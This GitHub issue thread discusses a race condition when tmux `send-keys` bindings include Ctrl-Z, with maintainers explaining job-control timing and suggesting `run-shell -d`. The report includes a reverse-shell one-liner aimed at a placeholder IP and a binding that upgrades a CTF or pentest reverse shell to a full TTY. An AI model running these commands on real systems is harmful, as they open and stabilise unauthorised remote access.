### ISSUE TITLE
`send-keys` Ctrl - Z breaks code execution inconsitently

### ISSUE THREAD

**Issue by ibitebyt3s** [tmux/tmux#3360]
- [x] Please read https://github.com/tmux/tmux/blob/master/.github/CONTRIBUTING.md
before opening an issue.
- [x] If you have upgraded, make sure your issue is not covered in the CHANGES file
for your version: https://raw.githubusercontent.com/tmux/tmux/master/CHANGES
- [x] Do not report bugs (crashes, incorrect behaviour) without reproducing on a tmux
built from the latest code in Git.

### Issue description
When using Ctrl - Z (`C-z`) inside a `send-keys` snippet it will break the code execution before or after the use of it. In the `tmux.config` when using the the first snippet `bind-key a` it will execute the first instructions until it reaches the `C-z` instruction which **sometimes will get executed as the final instruction or sometimes the previous line will be the last instruction, thus never executing `C-z`** . In the second snippet `bind-key s` **most of the times** only the instructions after `C-z` will get executed and when not, only the first instruction (the python line) and  `C-z` will be executed. 

I definelty couldn't narrow it down to something reproducible that will have the same beheaviour over time. It's worth saying that I was switching back and forth between `zsh` and `bash` in and outside tmux but the beheaviour was still very inconsitent. Also the lines separated by `C-m` will sometimes overlap.

For the second snippet I was using the [HTB](https://app.hackthebox.com/starting-point?tier=NaN) oopsie machine found in the tier 2 starting point but you can test this with your own machine with `bash -i >& /dev/tcp/$YOUR_IP/1337 0>&1`

```
# tmux.config
bind-key r source-file ~/tmux.conf \; display-message "~/tmux.conf reloaded";

bind-key a send-keys \
    "echo 'text inside file.txt' > file.txt" C-m \
    "echo 'hello in terminal'" C-m \
    "nano file.txt" C-m \
    C-z \
    "cat file.txt" \
    "echo 'hello in terminal again'" C-m \
    fg C-m \

bind-key s send-keys \
    "python3 -c 'import pty; pty.spawn(\"/bin/bash\")'" C-m \
    "export SHELL=bash" C-m \
    "export TERM=xterm-256color" C-m \
    "stty cols 93 rows 53" C-m \
    C-z \
    "stty raw -echo" C-m \
    fg C-m
```
0. Fresh tmux session with `tmux -Ltest kill-server ; tmux -vv -Ltest -f  tmux.conf new`
1. Created Bottom pane
2. Created upper right pane
3. Ran `bind-key a` on the upper left pane
4. Ran `bind-key a` on the upper right pane
5. manually typed `cat file.txt` on the upper left pane
6. Ran `bind-key s` on the bottom pane
![image](https://user-images.githubusercontent.com/20409221/197074820-6b3cc2b7-3a8a-49a7-adf6-5a56a041c126.png)

### Required information
* tmux version (`tmux next-3.4`): 
* Platform (`Linux x86_64`): 
* $TERM inside and outside of tmux (`tmux-256color` for both, inside and outside tmux): 
* Logs from tmux (`tmux kill-server; tmux -vv new`).
  - [tmux-client-497540.log](https://github.com/tmux/tmux/files/9834478/tmux-client-497540.log)
  - [tmux-out-497542.log](https://github.com/tmux/tmux/files/9834479/tmux-out-497542.log)
  - [tmux-server-497542.log](https://github.com/tmux/tmux/files/9834480/tmux-server-497542.log)

**Comment by krader1961** [comment]
What you're trying to do is pretty much guaranteed to result in a race condition involving shell job-control and changing ownership of the controlling tty. Which is why the behavior is inconsistent. Your example uses of `send-keys` don't appear to serve any useful purpose other than as a demonstration of `send-keys` so it's hard to recommend a good solution. But the first thing to do is break the `send-keys` example into three pieces around the Ctrl-z with short sleeps (a couple of milliseconds should be long enough) before and after the Ctrl-z to better simulate an actual human.

**Comment by ibitebyt3s** [comment]
Thanks for the explanation of the beheaviour and possible solution. 

The only real world use of `send-keys`is the second snippet. There I try to stablize remote `/bin/sh` shells that are usually used as a first connection from a server during pentests/CTFs. Details about it can be found in [this blog post](https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/). I already tried the same `sleep` solution without success. 
```
bind-key a send-keys \
    "python3 -c 'import pty; pty.spawn(\"/bin/bash\")'" C-m \
    "export SHELL=bash" C-m \
    "export TERM=xterm-256color" C-m \
    "stty cols 93 rows 53" C-m \
    "sleep 1" C-m \
    C-z \
    "sleep 1" C-m \
    "stty raw -echo" C-m \
    fg C-m
```
![image](https://user-images.githubusercontent.com/20409221/197084289-0bb7d8de-3a60-4bd7-8c15-ebdf06352f93.png)

**Comment by krader1961** [comment]
@ibitebyt3s: Ping? Did you get this working after connecting to the system in a fashion that attaches the shell's stdin/out/err to a pty?

**Comment by ibitebyt3s** [comment]
The `sleep` command doesn't work for the latest example. I also thought of a way of sleeping within tmux and not a shell regardless if it's remote or local. Afaik that would require a native tmux command that after a short google and search through `man tmux` I couldn' find. 

Yes, I noticed the tty error message but haven't made sense of the `pty` reasoning. Thank you. The thing is that I can't think of a way to connect to the remote shell in a way that allocates a pty. Needless to say that most of the times access to the system is very limited, like in this case, thus making me think that it might not even be possible.

Due to the (I think) dead end, for this use case, now we're limited to a tmux native `sleep` like command solution.

**Comment by nicm** [comment]
run-shell -d
